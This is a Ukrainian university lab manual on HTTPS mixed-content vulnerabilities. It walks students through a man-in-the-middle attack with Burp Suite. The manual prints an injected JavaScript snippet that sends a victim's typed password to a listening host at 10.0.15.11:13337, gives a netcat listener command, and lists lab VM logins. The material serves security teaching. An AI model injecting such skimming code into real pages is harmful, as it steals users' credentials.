Добавил:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:
3-2 Системи виявлення та протидії атакам / Методичні_вказівки_до_практичних_робіт_Системи_виявлення_та_протидії.doc
Скачиваний:
143
Добавлен:
02.02.2021
Размер:
4.51 Mб
Скачать

2 Вивчення протоколу httPs на прикладі mitm атаки

2.1  Мета роботи: використання зловмисного коду у незахищеному трафіку під час сеансу HTTPS..

2.2 Методичні вказівки з організації самостійної роботи студентів.

HTTPS корисний для захисту даних прикладного рівня моделі OSI. Оскільки протокол HTTP не захищений, зловмисник може запустити атаку MITM (man-in-the-middle), коли сторінка HTTPS завантажує HTTP-вміст, також відомий як змішаний вміст. Зловмисник впливає на HTTP-вміст, який надсилає до браузеру користувача.

2.3 Опис лабораторної установки (програмного забезпечення).

Топологія мережі

Логіни та паролі:

Parameter

Value

Username on Server Windows 2008

Administrator

Password on Server Windows 7

engensecPassword1

Username on Client Windows 7

engensec

Password on Client Windows 7

Username on Client Ubuntu 14.04.1

labuser

Password on Client Ubuntu 14.04.1

labuser

Username on Hypervisor

labuser

Password on Hypervisor

labuserpassword

2.4 Порядок виконання роботи і методичні вказівки з її виконання.

2.4.1 Використання вразливості змішаного вмісту. HTTPS використовується для забезпечення зв'язку між сервером і захистом веб-переглядача. Однак проблема виникає, коли сторінка HTTPS завантажує вміст HTTP: це називається «вразливість змішаного вмісту». Крок 1. Запустіть сервер Apache на Windows Server.

2.4.2 Почати прослуховування використовуючи wireshark на інтерфейсі eth0.

Запустити Firefox browser на Windows 7 або 10 та зайти https://10.0.15.13/lab2/

Як бачите, трафік зашифрован TLSv1.2.

Також Ви побачите Javascript file, завантажений завдяки HTTP протоколу. Це смішаний контент. Ви також можете змінити дані та вставити шкідливий код.

2.4.3 Відправимо трафік через проксі-сервер. Так, можна побачити та модифікувати трафік HTTP. В Firefox натисніть "ALT" button, click Tools -> Options -> Advanced -> Network -> Connection -> Settings. Після цього збережіть налаштування. Цей крок симулює атаку MitM.

На Win 7 Machine запускаємо “Burp Suite” з робочого стола. Після цього, в Burp буде працювати як http proxy. Оновити сторінку в Firefox. В Burp ви можете бачити новий HTTP запит.

Перейдіть на вкладку "Intercept" та оновіть сторінку в Firefox знову. "Burp" приймає новий запит, і ми можемо його змінити.

document.forms[0].onsubmit=function() {

vari = new Image();

i.src=’’.concat(‘http://10.0.15.11:13337/?pwd=’,document.getElementById(‘cpw’).value);

}

Вставте цей JS-код у вікно нижче. Натисніть "Forward". Цей крок показує заміну файлу.

На Ubuntu запустіть “nc –vvlp 13337”.

В Firefox введіть в поле “pa$aaword”

Натисніть “Enter”

Якщо відображається «super page», пароль правильний. Пароль був відправлений за протоколом HTTPS (!).

Після цього було викрадено пароль на Ubuntu machine

2.5 Зробити звіт.

2.6 Контрольні запитання і завдання.

1. Поясніть структуру запиту GET HTTP протоколу.

2. Поясніть структуру запиту POST HTTP протоколу.

4. Пояснити структуру протоколу HTTPs.

5. Що таке «вразливість змішаного вмісту»?

6. Поясніть сутність атаки MITM.